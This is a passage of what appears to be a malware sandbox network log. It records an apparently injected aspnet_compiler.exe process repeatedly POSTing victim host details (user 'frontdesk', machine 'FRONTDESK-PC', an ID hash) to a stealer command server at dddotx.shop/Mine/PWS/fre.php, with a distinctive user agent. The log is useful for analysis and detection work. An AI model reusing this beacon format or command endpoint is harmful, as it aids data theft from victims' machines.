Sep 25, 2024 10:20:50.103172064 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6g%2Bu8iU7RVnw1H3O3WsJKk6HYfQY5E0tO1uroo4uVcqHzrZaFHb%2BYVND7U3m%2B1miyYPJi4wjxgAUi3KpiCvDXVtA%2FPwaCXTx84MbQjkwNDPbvKSQv9j2jvqDcLakFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998e1f86843fe-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.7	49818	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:50.259907961 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:50.264754057 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:50.943537951 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eq0zNyrutuio9j8nmCVRNhIS11cpB6SwCqEEt100K1XL21xjHEVmklKlNngDERwIMKAts5%2FIT3mgkke%2BjNZvcVvP7CG5MHgcMFj%2FBPEiLHtA4n3kYoT%2B%2Fvd4OStSJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998e8aaac7287-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.7	49819	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:51.108577967 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:51.117098093 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:51.808655977 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HiCoRu50K94YqKMNXS5S0RkBEXA8LcnROofghhbTZWFGu%2FK0vyNXE1eMkhDMLjsCxtkTZ2F5ASasqMuOk7Z6p9pbcpDK%2BqvqMxG9vLdvU3lDwUcRuP8uHg0%2Ft0OAMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998ee1be94332-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.7	49820	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:51.960999966 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:51.965925932 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:52.620332956 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qr5pKYQ6%2F5OLfsG%2FEDe79%2BwxzCUBiOMlwNpJhJQipYAa3J8aIyL6cPYAaoeCnwavV4KesEdNwwcUJY92zGhdOc9qlnKmVDtq%2FSyIlVSeHBZdrp%2FtswvXieCu%2BHRUGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998f36b687c93-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.7	49821	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:52.842784882 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:52.847889900 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:53.479537010 CEST	599	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pxwNA5SuCsl4qq09zRcrlpxL85arzvbxIeEb%2FIAyJtVhAVJkO5tzJUBL4IcOjhRbMhWc6gXlX8%2FXgDPl5lge0WbkdmTcPP07ILu7I%2Feppe6dzlwujS4WEim%2FSGdRw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998f88c4b42c7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.7	49822	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:53.643552065 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:53.648400068 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:54.312777996 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsYbMJdF%2FKgpwwcPl9bC%2F2y4exCPTYkp9Z8yjBoBwTU8mTtRGcOTKatQDlmkHJFfZJELnO1BS39j0PF%2BI2ZgknxLEq39ziFQMsBPZ1I6uTlX%2BnzLrV7CrSP3f5yv9g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998fdde1343ed-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.7	49823	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:54.462533951 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:54.469238997 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:55.120852947 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2FBmmKVx5ZmWofONc72GEepNlLupNVwqrPytvvPE9VYOveH22R%2BZDPcWkS6mjDrBhe%2FMtA1dgil9X7yB6skSpOszbcFsI6FB0vTa5qo399Pdfy2yPwAr0V7ME5kJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899902fa4343c1-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.7	49824	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:55.272775888 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:55.277762890 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:55.938739061 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8x5HmqQRp2BvBbbVzS6B02LCjxLojHG74mNK2KnvJSO1ba3azho7SmADP5yGgfZrbMk02pXXJzZ0yk7mfW8irBrsR%2FnG3zBkNxqSyJe7JcHMMgdI6FOc2r3RXRxGw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899907fba242cb-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.7	49825	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:56.090480089 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:56.095547915 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:56.779473066 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYNPQvfEvhcxvWS5VOwyv1yCxKs9S6JEkOwfyx3RjxadntpJv2RzLrlFZRp56wfTzQ2dmLvOX8O9Hv2L%2FvZBIT4sak%2BxLo1vG8eTncdh5iPL6uHT%2BlQlPccAjOMZVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89990d18c30f8b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.7	49826	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:56.934875011 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:56.943671942 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:57.616049051 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKak2L11Xor6Cks1pxpaUNVX7%2FG3MWLUmSZSG1rQ1w0JNo1uVK0NRltaH4BAjCkUnG2Y8%2BsWnC%2FiR9eMIYPmoOqeD1Z5NjZ5wYAYxNOcqXJpEuIjPpLGKn8FVhGs%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8999125e44c328-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.7	49827	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:57.760231972 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:57.765116930 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:58.434281111 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4rH88egtgd%2BmdE0RFrzRYFc74p1SlsBf6cIp1oInjThlXgm4WQ5dIGCS28TId35WAASkWcoMynTtj09kEA7fCbc01aa%2BTwWQNkygn4j%2B5zhG%2FjLxGcHceh69tjzjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8999179cdd1986-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.7	49828	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:58.598668098 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:58.604734898 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:59.260694981 CEST	593	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8r09Fk3GS1KIdlpuUcIu5XLceQyeTbydkjA1Tfayb5YOsfLWEAg0S9sJDQCPI3T4TSHeH2NDY61dqA7fvQ%2Be621zKyBBvBFznmJYmnUIaQwBPYPIh8DCjtrsSRJv7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89991cc9b9437f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.7	49829	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:59.417433023 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:59.720005989 CEST	405	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:00.485549927 CEST	561	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e4O5SjfyKvTvkcIORLmMnvmUOjGDOBiHXCjmczcCi5SRaa4TwCPstAOVz5AReChb2g5mRllfaNU1j2Y6BHgbfZFf869hVw2cjN8CFbVHN6J9UqY9KxfKQD5D9H9xMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8999243c61c431-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.7	49830	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:00.647304058 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:00.652378082 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:01.352046967 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMOcjA%2BZD9nEySF8HZ0ApDjYpEAhiuWRxzAwsZU1bdsxiwev9gOZAvYFdH1M4ugHcscx21X4kx5WCGigAmgPBFZ%2FOleLygR2dZqyqKfAbrdHLmHGBKVv2mX2C4YsiA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899929aed28cb9-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.7	49831	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:01.504525900 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:01.509562969 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:21:02.141016006 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:21:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKRZk6oGtDJ3r6yBekAvvzCWk16HaByFAzu%2B34ddDGG00WJYzLZGuBoFI15MddBealgyk9iGU%2BxHbSZRL0J8k1pNTYO%2Fl7Ie1Y0chp%2BhDzXudi0pwngadlF5gizOKg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89992eeffa19bb-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.7	49832	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:21:02.525079012 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:21:02.530014992 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
